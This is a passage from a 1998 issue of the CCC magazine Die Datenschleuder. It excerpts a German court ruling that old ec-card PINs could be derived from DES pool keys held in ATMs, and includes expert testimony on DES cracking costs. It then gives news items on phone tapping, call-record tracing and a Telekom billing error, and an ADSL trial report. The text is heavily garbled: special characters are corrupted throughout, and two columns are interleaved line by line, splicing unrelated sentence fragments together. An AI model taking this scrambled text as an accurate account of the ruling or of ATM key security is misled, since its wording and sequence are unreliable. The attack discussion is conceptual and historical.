ausgebende Bank beweist, da§ der Karteninhaber
Auch die Annahme des OLG Hamm, der DES-
schuldhaft zum Mi§brauch der ec-Karte beigetragen
SchlŸssel beÞnde sich mittlerweile in HŠnden krimi-
hat, etwa indem er mit der PIN nicht sorgfŠltig
neller Organisationen, sei rein spekulativ und durch
umgegangen ist. Diesen Beweis vermochte die
nichts belegt.
Beklagte jedoch nicht fŸhren.
Bei dieser Sachlage sei daher davon auszugehen, da§
Die Beklagte hat keinerlei konkrete Tatsachen vorgetra-
die ec-Karte der KlŠgerin zusammen mit der PIN
gen, aus der sich ein schuldhaftes Verhalten der
abhanden gekommen sei, so da§ die KlŠgerin die ihr
KlŠgerin ableiten lie§e. Die Beklagte hat sich vielmehr
obliegende Pßicht zur sorgfŠltigen und getrennten
lediglich auf den von Rechtsprechung und Literatur
Aufbewahrung nicht erfŸllt habe und daher fŸr den
statuierten Anscheinsbeweis gestŸtzt, wonach der
entstandenen Schaden selbst hafte.
Einsatz der ec-Karte unter Verwendung der richtigen
Das Gericht hat Beweis erhoben durch Parteiverneh- PIN den Beweis des ersten Anscheins dafŸr begrŸnde,
mung der KlŠgerin und Anhšrung der Sachver- da§ der Karteninhaber entweder selbst verfŸgt oder
stŠndigen Dr. W. S. vom Bundesamt fŸr Sicherheit in durch ein sorgfaltswidriges Verhalten zum Mi§brauch
der Informationstechnik (BSI) und A. M.-M. vom der ec-Karte beigetragen habe.
Chaos Computer Club e.V. (CCC). [...]
Diesem Anscheinsbeweis liegt die Annahme zugrunde,
EntscheidungsgrŸnde: da§ eine Transaktion an einem Geldausgabeautomaten
Die Klage ist begrŸndet. oder POS-Terminal nur mit der geheimen PIN mšglich
Der KlŠgerin steht gegenŸber der Beklagten ein ist, welche nur dem Karteninhaber bekannt ist und die
Anspruch auf RŸckzahlung der im Zusammenhang aufgrund des Sicherheitssystems der Banken auch
mit der mi§brŠuchlichen Verwendung ihrer ec-Karte nicht von Dritten ermittelbar sei.
von ihrem Girokonto abgebuchten BetrŠge zu, da die Dieser Annahme kann sich das Gericht aber nicht
Beklagte nicht berechtigt war, das Konto der KlŠgerin anschlie§en, es sieht vielmehr aufgrund der
entsprechend zu belasten (¤ 812 Abs. 1 Satz 1 BGB). [...] durchgefŸhrten Beweisaufnahme die AnknŸpfungs-
Unstreitig wurde der KlŠgerin aber ihre ec-Karte punkte, die bisher allgemein zur Annahme des
Anscheinsbeweis fŸhrten, fŸr widerlegt an. [...]

Die Datenschleuder #64 Herbst 1998


Ein Urteil mit URL und FAQ...

Dreh- und Angelpunkt sŠmtlicher Entscheidungen ist SchlŸssels ermittelt werden, wobei es in der Fachwelt
daher die Beurteilung des Sicheitssystems der Banken, unstreitig ist, da§ es keinerlei Probleme bereitet, die
insbesondere die Frage, ob es fŸr Unbefugte technisch jeweilige PIN zu errechnen, wenn man entweder im
mšglich ist, die geheime PIN zu ermitteln. [...] Besitz des DES- oder eines Pool-SchlŸssels ist.
Aufgrund der durchgefŸhrten Beweisaufnahme sieht Der SachverstŠndige Weber von der Zentralstelle fŸr
es das Gericht nunmehr aber nicht mehr nur fŸr Sicherheit in der Informationstechnik hat bereits in sei-
theoretisch denkbar, sondern fŸr praktisch erwiesen nem Gutachten vom 7.8.1990 fŸr das AG DŸsseldorf
an, da§ die PIN selbststŠndig durch EntschlŸsseln ausgefŸhrt, da§ die korrekte PIN mit einem simplen
anhand der auf der Karte gespeicherten Daten Programm mittels eines PC«s im Bruchteil einer
ermittelt werden kann, das Sicherheitssystem der Sekunde errechnet werden kšnne, wenn man im Besitz
Banken mithin nicht mehr so sicher ist, da§ von einem des DES- oder PoolschlŸssels ist. Auch die vom
Anscheinsbeweis zugunsten der Banken ausgegangen Gericht angehšrten SachverstŠndigen Dr. S. und M.-M.
werden kann. [...] haben dies Ÿbereinstimmend bestŠtigt.
Das Gericht sieht es vielmehr als erwiesen an, da§ der Die bisher von allen Gerichten als wahr unterstellte
DES-SchlŸssel von Unbefugten errechnet werden kann Behauptung der Banken, es sei bis heute nicht
und mittlerweile auch errechnet worden ist. gelungen, den DES-SchlŸssel zu dechiffrieren, ist zur
Das Gericht kann der Behauptung der Beklagten, der †berzeugung des Gerichts mittlerweile jedoch
DES-SchlŸssel beÞnde sich nicht in den Geldausgabe- widerlegt.
automaten, sondern nur in den nationalen Rechen- Grundlage der bisher herrschenden Rechtssprechung
zentren, in dieser Form nicht folgen. Dies mag fŸr den war die Annahme, da§ es nach heutigem wissenschaft-
jetzigen Zeitpunkt und fŸr die Geldausgabeautomaten lichen Kenntnisstand unmšglich sei, den DES-
der Beklagten gelten, fŸr den hier allein entscheidenen SchlŸssel mit herkšmmlichen Mitteln zu dechiffrieren,
Tatzeitraum - Anfang 1997 - gilt diese Aussage aber da der DES-Algorithmus 56 Bits, es also Ÿber 70
nicht, da sie nicht berŸcksichtigt, da§ mittlerweile die Billiarden ... SchlŸssel in Betracht kommen.
sogenannten "neuen PIN-Verfahren" (vgl. Dr. Werner Die von den Gerichten eingeschalteten Sachver-
Schindler, NJW-CoR 1998, 223 ff.) eingefŸhrt worden stŠndigen haben zwar stets betont, da§ es theoretisch
sind, der hier streitige Vorfall aber noch das "alte PIN- denkbar sei, einen entsprechenden Computer zu
Verfahren" betrifft. [...] bauen, mit dem der DES- bzw. Pool-SchlŸssel errech-
Beim alten PIN-Verfahren mu§ zwischen den net werden kšnne, sind aber bisher Ÿbereinstimmend
institutseigenen DES-SchlŸsseln und den sogenannten zu der Schlu§folgerung gelangt, da§ eine derartige
Pool-SchlŸsseln differenziert werden. "Hšllenmaschine" (AG Hannover, Urteil vom 9.5.1997,
WŠhrend die institutseigenen DES-SchlŸssel in der Tat CR 1997, 742 f.) derzeit nicht existiere.
allein in den nationalen Rechenzentren der Banken Der SachverstŠndige Weber ....hat hierzu ... 1990 ...
verwahrt werden, befanden sich die Pool-SchlŸssel in zwei konkrete AnsŠtze zum Bau eines derartigen
jedem Geldausgabeautomaten, da sie in den Anfangs- Computers ...: Entweder werde fŸr 40 Millionen US $
jahren zur Ofßine-Authorisierung institutsfremder ec- ein Spezialcomputer gebaut, der innerhalb eines Tages
Karten dienten. den DES-SchlŸssel errechnen kšnne, oder es werde ein
Der SachverstŠndige Dr. S., Mitarbeiter in der Computer fŸr 4 Millionen US $ gebaut, der dann aber
Abteilung "Kryptographische Sicherheit" beim BSI hat eine Rechenzeit von 2,3 Jahren habe.
in seinem Interview in der NJW-CoR 4/98 (S. 223ff.) Auch der SachverstŠndige Prof. Heuser vom ... (BSI)
ausgefŸhrt, da§ hierzu bei den alten ec-Karten der hat in seinem Gutachten fŸr das OLG Hamm ausge-
Geldausgabeautomat anhand eines im Automaten hin- fŸhrt, da§ ein Computer fŸr mehrere hunderttausend
terlegten Pool-SchlŸssels und dem Offset, einer auf DM zu bauen sei, der innerhalb von 3 bis 4 Monaten
dem Magnetstreifen beÞndlichen, kartenabhŠngigen den geheimen SchlŸssel Þnden kšnne.
vierstelligen Zahl, jede deutsche PIN errechnen Der SachverstŠndige Dr. S. hat bei seiner Anhšrung im
konnte. Beweisaufnahmetermin am 31.7.1998 ausgesagt, da§ es
Nach den alten PIN-Verfahren konnte die PIN daher durchaus vorstellbar sei, da§ jemand auf den
entweder anhand des institutseigenen DES-SchlŸssels Tatzeitpunkt bezogen fŸr ca. 300.000.-- DM einen
(Data Encryption Standard des US-amerikanischen derartigen Spezialrechner hŠtte bauen kšnnen, der
National Bureau of Standards), oder des Pool- dann innerhalb von ca. 3 Monaten den Pool-SchlŸssel

Herbst 1998 Die Datenschleuder #64


...und DES und RSA...

hŠtte errechnen kšnnen. Er gehe aber davon aus, da§


eine derartige Maschine bisher nicht gebaut worden
sei, da die Anfangsinvestition zu hoch seien.
In einem FAQ (Frequent Answers & Questions) der
Uni Trier (http://www.informatik.uni-trier.de/~damm/Lehre/E-
Money/ecCardsSecurityFAQ.html) wird unter Hinweis auf einen
Aufsatz von Martin Blaze (Minimal Key Lengths for
Symmetric Chipers to Provide Adequate Commercial
Security, ftp://ftp.research.att.com/dist/mab/keylength.txt) darge-
legt, da§ unter Verwendung spezieller programmierba-
rer Chips (FPGA-Chips), die pro Sekunde 30 Millionen
SchlŸssel testen kšnnten und die 1997 lediglich noch
200 US $ gekostet hŠtten, bereits mit einer Investition
von lediglich 20.000 US $ einer von drei Pool-
SchlŸsseln binnen 69 Tagen gefunden werden kšnne.
Der SachverstŠndige M.-M. hat in seiner Anhšrung am
31.7.1998 darŸber hinaus dargelegt, da§ es zum als 250.000,-- US $ einen Spezialcomputer gebaut und
Dechiffrieren des DES-SchlŸssels noch nicht einmal damit in weniger als drei Tagen den vermeintlich
unbedingt notwendig sei, selbst einen derartigen sicheren DES-SchlŸssel dechiffriert.
Spezialcomputer zu bauen, da es beispielsweise in den Die EFF hat hierzu ausgefŸhrt, da§ damit bewiesen
USA durchaus auch mšglich sei, RechnerkapazitŠten sei, da§ der DES-SchlŸssel nicht sicher sei und da§ der
auf entsprechenden Hochleistungscomputern erforderliche Rechner weder schwierig zu entwerfen
anzumieten. noch zu bauen sei. Sie bietet sogar eine Bauanleitung
SŠmtliche bisherige Urteile und Stellungnahmen der fŸr einen derartigen Computer an, der Ÿber das Inter-
SachverstŠndigen basieren allein auf der Annahme, net bestellt werden kann (http://www.eff.org/descracker.html).
da§ der Bau eines derartigen Computers zwar tech- Es besteht also - wie bislang angenommen - nicht mehr
nisch mšglich, aber unwahrscheinlich und nicht nur die theoretisch denkbare Mšglichkeit zum
nachgewiesen sei. Diese Annahme ist mittlerweile Errechnen des DES-SchlŸssels mittels eines
jedoch widerlegt. Spezialcomputers, eine derartige "Hšllenmaschine"
Bereits 1997 gelang es im Rahmen eines von der Firma existiert vielmehr und kann von jedem mittels der
RSA in den USA ausgeschriebenen Wettbewerbs, den Bauanleitung der EFF auch nachgebaut werden.
DES-SchlŸssel mittels handelsŸblicher Personalcom- SŠmtliche Vermutungen der SachverstŠndigen, die
puter und Workstations innerhalb von weniger als fŸnf gegen die Annahme der Existenz eines derartigen
Monaten zu entschlŸsseln. Hierzu wurden mehrere Rechners sprechen, sind damit spŠtestens seit dem
10.000 Computer per Internet miteinander verbunden. Erfolg der EFF hinfŠllig geworden.
Dieses Experiment wurde im FrŸhjahr 1998 mit dem Gerade die Demonstration der EFF zeigt nach Ange-
Resultat wiederholt, da§ der DES-SchlŸssel auf die sichts des Gerichts aber auch, da§ die Annahme der
gleiche Weise bereits innerhalb von 39 Tagen SachverstŠndigen, Kriminelle hŠtten einen derartigen
entschlŸsselt war. Computer noch nicht gebaut, da sie zunŠchst hohe
Zu Recht verweist aber der SachverstŠndige Dr. Investitionskosten hŠtten vorstrecken mŸssen, nicht
Schindler in seinem Interview in der NJW-CoR (1998, stichhaltig ist.
223) darauf, da§ hierfŸr mehrere 10.000 Mitstreiter Die EFF, ein dem deutschen Chaos Computer Club
benštigt worden seien, wŠhrend zur Vorbereitung von vergleichbarer Verein, hat aus rein sportlichen ErwŠ-
Straftaten die Erregung derart šffentlicher Aufmerk- gungen die Mittel zum Bau eines derartigen Com-
samkeit wohl eher unerwŸnscht sei. puters aufgebracht, das von der RSA im Rahmen des
Im Juli 1998 ist es aber der ... (EFF) in den USA von ihr initiierten Wettbewerbs (RSA DES Challenge II)
gelungen, den 56 bit DES-SchlŸssel innerhalb von ausgelobte Preisgeld in Hšhe von 10.000,-- US $ deckte
lediglich 56 Stunden zu knacken (DER SPIEGEL, vom nur einen kleinen Teil der Kosten.
27.7.1998, S. 162). Im Hinblick auf die erzielbaren "Gewinne" - die
Die EFF hat hierzu nach eigenen Angaben fŸr weniger Gesamtschadenssumme aller vom Bundeskriminalamt

Die Datenschleuder #64 Herbst 1998


...und BSI...

(BKA) registrierten ec-Mi§brauchsfŠlle betrug 1997 lediglich den im Sicherheitsmodul bereits


immerhin insgesamt 41.537.548,-- DM erscheint dem gespeicherten Pool-SchlŸssel kopieren mu§.
Gericht eine Investition von 300.000,-- DM laut Dies lŠ§t sich nach Angaben des SachverstŠndigen M.-
SachverstŠndigen Dr. S., bzw. 20.000,-- US $ gemŠ§ M. trotz der bestehenden Sicherheitseinrichtungen
dem Aufsatz von Martin Blaze (Minimal Key Lengths innerhalb eines Geldausgabeautomaten innerhalb von
for Symmetric Chipers to Provide Adequate Com- ca. einer Woche ohne weiteres realisieren.
mercial Security, ftp://ftp.research.att.com/dist/mab/keylength.txt) Die technischen Mšglichkeiten eines derartiges
durchaus vertretbar und nicht abwegig. Mi§brauchs wurden bereits 1980 beschrieben (Norbert
Gerade in der Organisierten KriminalitŠt werden Ryska, Mšglichkeiten der DatenverschlŸsselung bei
beispielsweise im DrogengeschŠft erheblich grš§ere Geldausgabeautomaten, Computerwoche 44 vom
Anfangsinvestitionen eingesetzt, um spŠter 31.10.1980): Es gibt die Mšglichkeit der passiven
entsprechende Gewinne abzuschšpfen. InÞltration durch elektromagnetische Aufzeichnung,
Die Vermutungen der SachverstŠndigen, die gegen die durch Anzapfen von Leitungen und den Einsatz von
Annahme der Existenz eines derartigen Rechners spra- Wanzen, oder die aktive InÞltration in Form der
chen, sind damit spŠtestens seit dem Erfolg der "EFF" Beschaffung unberechtigter Informationen durch
als hinfŠllig zu betrachten. [...] berechtigten Systemzugriff (browsing), die Simulation
Da diese Vermutungen aber die zentrale Grundlage fŸr eines berechtigten Systemzugriffs durch illegale
die Annahme eines Anscheinsbeweis zugunsten der Beschaffung der benštigten IdentiÞkationsdaten
Banken bildete, da davon ausgegangen wurde, da§ die (masquerading), Ausnutzen von Hardware- oder
PIN aufgrund des Sicherheitssystems der Banken nicht Software-Schwachstellen (trap doors) Ÿber in die
von Dritten ermittelbar sei, kann dieser Anscheins- Leitung geschaltete Terminals bei inaktivem
beweis nicht weiter gelten. Benutzerterminal (between-lines-entry) oder das
Aufzeichnen des Benutzerdialogs mit der CPU und
UnabhŠngig davon geht das Gericht aber auch davon
Einschleusen falscher RŸckantworten an den Benutzer
aus, da§ bereits vor der šffentlichen Demonstration
(piggy back).
der "Electronic Frontiert Foundation" zur
Dechiffrierung des DES-Codes ein sogenannter Pool- Im Hinblick auf die berechtigte Kritik an der Vorge-
SchlŸssel entschlŸsselt worden ist. [...] hensweise des SachverstŠndigen P, der es abgelehnt
hatte, seine gutachterlichen €u§erungen eine Demon-
Zu einem derartigen Sicherheitsmodul innerhalb eines
stration am Objekt zu untermauern, hatte das Gericht
Geldausgabeautomaten wird in einem Aufsatz der
im Beweisaufnahmetermin am 31.7.1998 angeregt, da§
Computerwoche Nr. 44 vom 31.10.1980 ausgefŸhrt,
die Beklagte dem SachverstŠndigen M.-M. einen
da§ dieses eine Hardware-Implementation des DES-
Geldausgabeautomaten zur VerfŸgung stellt, damit dieser
SchlŸssels sei. Es besitze die vom National Bureau of
praktisch demonstrieren kann, da§ ein Pool-SchlŸssel
Standards vergebene PrŸßizens Ÿber eine funktions-
ohne grš§eren Aufwand in einem vertretbaren
getreue Nachbildung dieses in den USA genormten
zeitlichen Rahmen entschlŸsselt werden kann.
VerschlŸsselungsverfahrens.
Diese Demonstration scheiterte aber daran, da§ die
Das VerschlŸsselungsmodul stehe Ÿber eine Software-
Beklagte erklŠrte, sŠmtliche ihrer Geldausgabeauto-
Schnittstelle dem System und auch dem Anwender zur
maten seien mittlerweile auf das neue PIN-Verfahren
VerfŸgung. System und Anwender kšnnen mit Hilfe
umgestellt, so da§ sie Ÿber keinen Geldausgabeauto-
eines Dienstprogramms folgende Funktionen
maten mit integriertem Pool-SchlŸssel mehr verfŸge.
durchfŸhren: VerschlŸsselung von Datenblšcken nach
Sie habe auch kein Sicherheitsmodul eines alten Geld-
verschiedenen DES-Modi (ECB, CBC, CFB), Erzeugen
automaten mehr vorrŠtig, auch sehe sie sich nicht
und Laden von DES-SchlŸsseln sowie Bilden einer
mehr in der Lage Ÿber den Hersteller ihrer
PrŸfsumme Ÿber Programme und Bibliotheken.
Geldausgabeautomaten an ein derartiges Modul
Aufgrund dieser Gegegebenheiten ist es aber fŸr einen heranzukommen.
unbefugten Dritten, der sich einen Geldausgabeauto-
Nicht nur im Hinblick auf dieses anhŠngige Verfahren,
maten beschafft hat, mit erheblich geringerem
sondern auch im Hinblick darauf, da§ - wie bereits
Aufwand mšglich, an den DES-codierten Pool-
dargelegt - die Gerichte sich in einer Vielzahl von
SchlŸssel zu gelangen, da hierfŸr nicht mehr das syste-
FŠllen mit dem Mi§brauch von ec-Karten nach dem
matische Durchprobieren aller 72.057.594.037.927.936
alten PIN-Verfahren auseinanderzusetzen haben,
denkbaren SchlŸssel erforderlich ist, er vielmehr

Herbst 1998 Die Datenschleuder #64


...und EFF und CCC

wobei die Anzahl der Verfahren nach Auskunft der


Beklagten zumindest seit der Veršffentlichung der
Entscheidung des OLG Hamm vom 17.3.1997 deutlich
gestiegen ist, ist ein derartiges Verhalten nicht
nachvollziehbar.
Der Beklagte ist bekannt, da§ es eine Vielzahl von
FŠllen gibt, in denen Kunden sich Ÿber eine
mi§brŠuchliche Nutzung ihrer ec-Karte beschweren
und behaupten, die PIN sorgfŠltig verfahrt zu haben.
Der Beklagte ist ferner bekannt, da§ es in den gerichtli-
chen Verfahren hŠuÞg zur Einschaltung von Sachver-
stŠndigen kommt, die dann - wie der SachverstŠndige
Dr. S. im hiesigen Verfahren - zur Erstattung ihrer
Gutachten wissen mšchten, wie die PIN und die
Offsets der streitgegenstŠndlichen ec-Karte lauteten.
Nach der Vernichtung der Sicherheitsmodule mit den
Pool-SchlŸsseln kann die Beklagte Ÿber den institutsei- einen der Pool-SchlŸssel zu gelangen.
genen DES-SchlŸssel zwar noch die PIN, jedoch nicht GegenŸber dem aufwendigen Errechnen des
mehr die Offsets rekonstruieren. institutseigenen DES-SchlŸssels hat die Kenntnis eines
Die Beklagte hat es daher durch die Vernichtung der Pool-SchlŸssels den Vorteil, da§ damit die PIN«s der
Sicherheitsmodule mit den Pool-SchlŸsseln unmšglich ec-Karten sŠmtlicher Banken bestimmt werden kann,
gemacht, die AufklŠrung eines bereits eingetretenen wŠhrend die Kenntnis des institutseigenen DES-
Schadensereignisses zu ermšglichen, obwohl ihr die spŠtere SchlŸssels nur die Bestimmung der PIN fŸr ec-Karten
Notwendigkeit einer BeweisfŸhrung bereits erkennbar sein des jeweils betreffenden Instituts ermšglicht. [...]
mu§te, so da§ sie sich selbst die Mšglichkeit des Die Schadenssumme habe 1997 bei 41.537.548,-- DM
Entlastungsbeweises vereitelt hat. gelegen und stelle eine Zunahme von 26 % gegenŸber
Wie bereits dargelegt, ist grundsŠtzlich die dem Vorjahr dar. [...]
kartenausgebende Bank dafŸr beweispßichtig, da§ der Zum anderen leuchtet dem Gericht die Argumentation
berechtigte Karteninhaber schuldhaft zum Mi§brauch des SachverstŠndigen M.-M. ein, der dargelegt hat, da§
der ec-Karte beigetragen hat, etwa indem er mit der es fŸr die TŠter kontraindiziert wŠre, durch einen mas-
PIN nicht sorgfŠltig umgegangen ist. siven Einsatz der Kenntnis eines Pool-SchlŸssels auf
Das Gericht folgt daher - da der Gegenbeweis nicht sich aufmerksam zu machen. Wenn es zu einem
mehr gefŸhrt werden kann - den AusfŸhrungen des signiÞkanten Anstieg der ec-Karten-Mi§brauchsfŠlle
SachverstŠndigen M.-M., wonach derjenige, der im gekommen wŠre, hŠtten die Banken sofort den
Besitz eines Geldausgabeautomaten ist, einen Pool- betreffenden Pool-SchlŸssel gesperrt, die Kenntnis der
SchlŸssel ohne grš§eren Aufwand in einem vertret- TŠter wŠre damit auf einen Schlag hinfŠllig geworden.
baren zeitlichem Rahmen entschlŸsseln kann. Der SachverstŠndige M.-M. hat dies insoweit treffend
mit dem Satz formuliert: "Man schlachtet nicht die
Voraussetzung hierfŸr ist aber, da§ ein unbefugter
Kuh, die man melken mšchte". [...]
Dritter in den Besitz eines Geldautom. gelangt wŠre.
Aufgrund des beiderseitigen Parteienvortrages und
Nach Angaben des SachverstŠndigen M.-M. sind
der durchgefŸhrten Beweisaufnhame steht zur
mittlerweile europaweit bereits mehrere hundert Geld-
†berzeugung des Gerichts fest, da§ im vorliegenden
ausgabeautomaten gestohlen worden, was sicherlich
Fall mit der gestohlenen ec-Karte der KlŠgerin an
auch damit zu erklŠren ist, da§ ein frisch gefŸllter
Geldausgabeautomaten und an einem POS-Terminal
Geldausgabeautomat Bargeld im Wert von Ÿber 1/4
erfolgreich Transaktionen durchgefŸhrt werden
Million DM enthŠlt.
konnten, obwohl die KlŠgerin ihre PIN sicher verwahrt
Das Gericht teilt insoweit aber auch die EinschŠtzung hatte und Dritte keine Mšglichkeit gehabt hatten, die
des SachverstŠndigen M.-M., da§ sicherlich der eine PIN in irgendeiner Form zu erspŠhen. [...]
oder andere TŠter nicht nur am Bargeld, sondern auch
daran interessiert war, Ÿber das Sicherheitsmodul an

Die Datenschleuder #64 Herbst 1998


Aus aller Welt

Polizei faßt illegalen Doch erst die Digitalisierung ermšglicht eine


rŸckwirkende Suche nach allen GesprŠchen von
Dauertelefonierer auf Wiese und zu einem bestimmten Anschlu§. Um die tŠg-
lich 150 Millionen GesprŠche zu durchsuchen,
Potsdam (AP) Wochenlang zog ein 30jŠhriger brauche der Rechner zwei bis drei Stunden, sagte
ausgerŸstet mit technischem GerŠt auf eine Wiese Lissek.
in Brandenburg, um kostenlos und illegal zu Ein Sprecher des Bundeskriminalamtes sagte,
telefonieren. Heimlich hatte er eine oberirdische schon aufgrund der hohen Kosten werde von die-
Telefonleitung angezapft und fŸr rund 6.500 Mark ser Mšglichkeit nur selten Gebrauch gemacht.
GesprŠche gefŸhrt. Wie eine Polizeisprecherin am Lissek zufolge kostet ein Suchlauf rund 28.000
Freitag mitteilte, alarmierte die Telekom die Mark. Die LŠnder meinten, die Telekom mŸsse
Behšrden, die daraufhin den in Frage diese Leistung kostenlos erbringen. Die Telekom
kommenden Telefonmasten observierte. Dort sehe dies zwar anders, sei aber nicht vor Gericht
verriet sich der Dauertelefonierer schlie§lich gezogen.
durch Rascheln im GebŸsch, wo sechs Polizisten Der Bundesbeauftragte fŸr den Datenschutz,
ihn auf dem Boden liegend entdeckten. Vehement Joachim Jacob, dringt darauf, da§ die Verbin-
versuchte der 30jŠhrige sich seiner Festnahme zu dungsdaten Çnur herausgegeben werden, wenn
widersetzen: Einem Beamten bi§ er in den Fu§, es sich um Straftaten von erheblicher Bedeutung
einem weiteren zerri§ er die Kleidung. handeltÈ. Daten von Nichtbetroffenen mŸ§ten
sofort wieder gelšscht werden; Berufsgeheimnisse
Polizei kann auch altes Telefonat und Zeugnisverweigerungsrechte m٤ten
beachtet werden, sagte er "Report".
zurückverfolgen Seine Sprecherin Helga Schuhmacher erklŠrte
AP, die geplante Novelle des zugrundeliegenden
Baden-Baden (AP) Seit der Digitalisierung des Paragraphen im Fernmeldeanlagengesetz sei im
Telefonnetzes vor einem halben Jahr kann die Bundesrat gescheitert. Alle Parteien seien sich
Polizei auch rŸckwirkend feststellen, wer mit aber einig, da§ er in der nŠchsten Legislatur-
wem wie lange gesprochen hat. Damit seien periode "in die Strafproze§ordnung ŸberfŸhrt
bereits beachtliche Fahndungserfolge erzielt werden mu§, wo er hingehšrt." Derzeit sei den
worden, berichtete das ARD-Magazin "Report Strafverfolgern der Zugriff auf die Verbindungs-
Baden-Baden" am Montag abend. Zum Beispiel daten "ohne jede Schwelle" mšglich.
habe die Polizei im Juni in Hamburg einen
EntfŸhrten befreien kšnnen, weil die Erpresser
die Eltern des Opfers kurz anriefen und die
Zahl der Telefonüberwachungen
Nummer der Anrufer dabei im Telekom- deutlich gestiegen
Zentralcomputer gespeichert wurde.
Wie Telekom-Sprecher Ulrich Lissek erklŠrte, Bonn (dpa) - Die Zahl der TelefonŸber-
speichert der Rechner zwei Tage lang die Num- wachungen ist im vergangenen Jahr deutlich
mern und die Dauer sŠmtlicher TelefongesprŠche. gestiegen. Im Bundesgebiet wurden insgesamt
Daraus wird dann die GebŸhrenrechnung fŸr die knapp 2000 †berwachungen angeordnet. Das
Telefonkunden erstellt. Laut Fernmeldeanlagen- waren 10,7 Prozent mehr als im Vorjahr. Diese
gesetz aus dem Jahr 1915 mŸssen die Verbin- Zahlen nannte der Parlamentarische GeschŠfts-
dungsdaten auf richterliche Anordnung auch der fŸhrer der FDP- Fraktion, van Essen. Die grš§te
Polizei zur VerfŸgung gestellt werden. Gesamtzahl von TelefonŸberwachungen verzeich-

Herbst 1998 Die Datenschleuder #64


nete erneut Bayern. Bremen war im vergangenen
Jahr Schlu§licht bei den TelefonŸberwachungen.

Computerpanne verursachte Pakete


falscher Einzelverbindungsdaten
Hamburg/Bonn (AP) Mit einer
Computerpanne hat die Telekom erklŠrt, da§ an
vier Kunden im Bereich Frankfurt am Main dicke
Pakete mit Einzelverbindungsnachweisen
versandt worden sind, die gar nicht fŸr sie
bestimmt waren. Telekom-Sprecher Ulrich Lissek
sagte am Donnerstag in Bonn, der Vorgang sei
dem Unternehmen peinlich. Man kšnne sich nur
entschuldigen. Schaden sei allerdings nicht Wütende Proteste nach Verkauf von
entstanden, da aus den Einzelverbindungsnach-
weisen nicht hervorgegangen sei, von welchem Telefongesellschaft
Telefonanschlu§ aus die aufgelisteten Telefon-
gesprŠche gefŸhrt worden seien. San Juan (AP) Nach der Privatisierung der
Das ãHamburger AbendblattÒ hatte berichtet, puertoricanischen Telefongesellschaft ist es am
an 17 Telekom-Kunden im Raum Frankfurt am Donnerstag zu wŸtenden Protesten von strei-
Main seien jeweils 1.273 Seiten AufzŠhlungen von kenden Arbeitern gekommen. Es wurden Bomben
Einzelverbindungen anderer Kunden fŸr den gelegt, Bankautomaten zerstšrt und Telefonkabel
Zeitraum vom 28. Mai bis 7. Juli versandt zerschnitten und verbrannt. Zwei gro§e Gewerk-
worden. Jedes der Pakete habe eine Außistung schaften lšsten Konten bei der Banco Popular auf,
von insgesamt rund 55.000 angewŠhlten die an der Privatisierung beteiligt ist. "Puerto Rico
Telefonnummern sowie Dauer und Kosten der steht nicht zum Verkauf", erklŠrte ein Gewerk-
GesprŠche enthalten. schaftssprecher.
Telekom-Sprecher Lissek erlŠuterte, beim Die Sabotageaktionen begannen nur wenige
Ausdruck der DatensŠtze habe es einen Stunden nachdem Gouverneur Pedro Rossello
Systemabbruch im Computer gegeben. Die das Gesetz unterzeichnet hatte. FŸr 1,9 Milliarden
Telefonrechnungen seien zwar gedruckt und Dollar geht die Puerto Rico Telephone Co. an ein
verschickt worden, die DruckauftrŠge aber fŠlsch- Konsortium unter FŸhrung des US-Telekommu-
lich nicht aus der Warteschlange gelšscht worden. nikationskonzerns GTE Corp. Von den US-
Als das System wieder gelaufen sei, hŠtten Behšrden mu§ die †bernahme noch gebilligt
Kunden zwar korrekte Rechnungen, als Anlage werden. Aus Angst um ihre ArbeitsplŠtze streiken
aber wegen des Systemfehlers einen dicken die 6.400 der Telefongesellschaft schon seit mehr
Packen Einzelnachweise erhalten. Da es Firmen als einer Woche. Inzwischen wurden die
gebe, die ihre Abrechnungen nicht elektronisch, Leitungen von 345.000 der 1,3 Millionen Kunden
sondern als mehrere Finger dicke PapierbŸndel und von der HŠlfte der 750 Bankautomaten der
erhielten, sei der Fehldruck den BeschŠftigten Insel durchschnitten oder zerstšrt.
zunŠchst auch nicht aufgefallen.

Die Datenschleuder #64 Herbst 1998


ADSL Feldversuch

Tante T gibt sich zukunftsträchtig. ADSL steht fŸr Asymetric Digital Subscriber
Ein Feldversuch der Telekom in Line und wurde im FrŸhjahr als die Technik der
Nordhein-Westfalen erprobt das Zukunft gehyped. ADSL kann 8 Mbit in die
erste Mal in Deutschland die neue Richtung zum Kunden und 768 kBit in die zum
ADSL-Technologie. Internet Ÿbertragen. Auch wenn das
Mi§verhŠltnis nicht ganz so kra§ ist, erinnert das
ganze sehr an BTX-Zeiten, wo man mit 1200/74
Da§ die Telekom immer schon eigene Bit zwar recht schnell empfangen konnten,
Vorstellungen von Begriffen wie "gŸnstig" oder senden aber nur mit Tippgeschwindigkeit möglich
"schnell" hat, sollte allgemein bekannt sein. war. Was soll der dumme Kunde auch senden
Deshalb versucht sie auch immer noch, uns einen wollen? Er soll gefŠlligst die ganzen bunten
"superschnellen Internetzugang mit T-Online und Bilder anschauen und froh sein, was er geboten
ISDN" aufzuschwatzen. Feste Internetanbindung bekommt. Neben dem Nachteil der ungleich
gibt es hingegen nur widerwillig und zu Kosten, verteilten Bandbreite ist ADSL aber ganz nett: es
die einfach indiskutabel sind - klar, daß der funktioniert Ÿber die vorhandenen
magenta Riese lieber versucht, seine Kupferleitungen, die weiterhin paralell zum
Standleitungen unters Volk zu bringen, als in Telefonieren genutzt werden kšnnen. Man hat
alternative Wege fŸr den Internetzugang zu dann also Telefon und Standleitung auf einem
investieren. einzigen Aderpaar. Allerdings kann ADSL nur
So wird die Entwicklung von Kabel-Internet, einige tausend Meter ŸberbrŸcken, so da§
in den USA das normalste der Welt, von der T spŠtestens in der nŠchsten Vermittlungsstelle die
behindert, wo es auch immer mšglich ist. Damit Gegenstelle sitzen mu§. Die Vermittlungsstelle
man aber nicht ganz so unangenehm als gehšrt der Telekom, die Gegenstelle gehšrt der
Zukunftsbremser auffŠllt, gibt es den ADSL- Telekom, was ist da anderes zu erwarten, als da§
Pilotversuch, auf den Kritiker bei Bedarf man das ganze auch an das Internet der Telekom,
hingewiesen werden. schlimmer noch T-Online angeklemmt hat.
Wer im FrŸhjahr auf einer rei§erischen Page
Anzeige der Telekom zum Thema ADSL Informationen
bestellt hatte, bekam mit etwas GlŸck Anfang
August einen Anruf, wann man denn kommen
sollte, das ADSL-Modem installieren. Ja, da
hŠtten sich einige gewundert, die nur
Infomaterial angefordert hŠtten; es lŠge jedenfalls
ein Auftrag vor.
Im Feldversuch kostet die Teilnahme
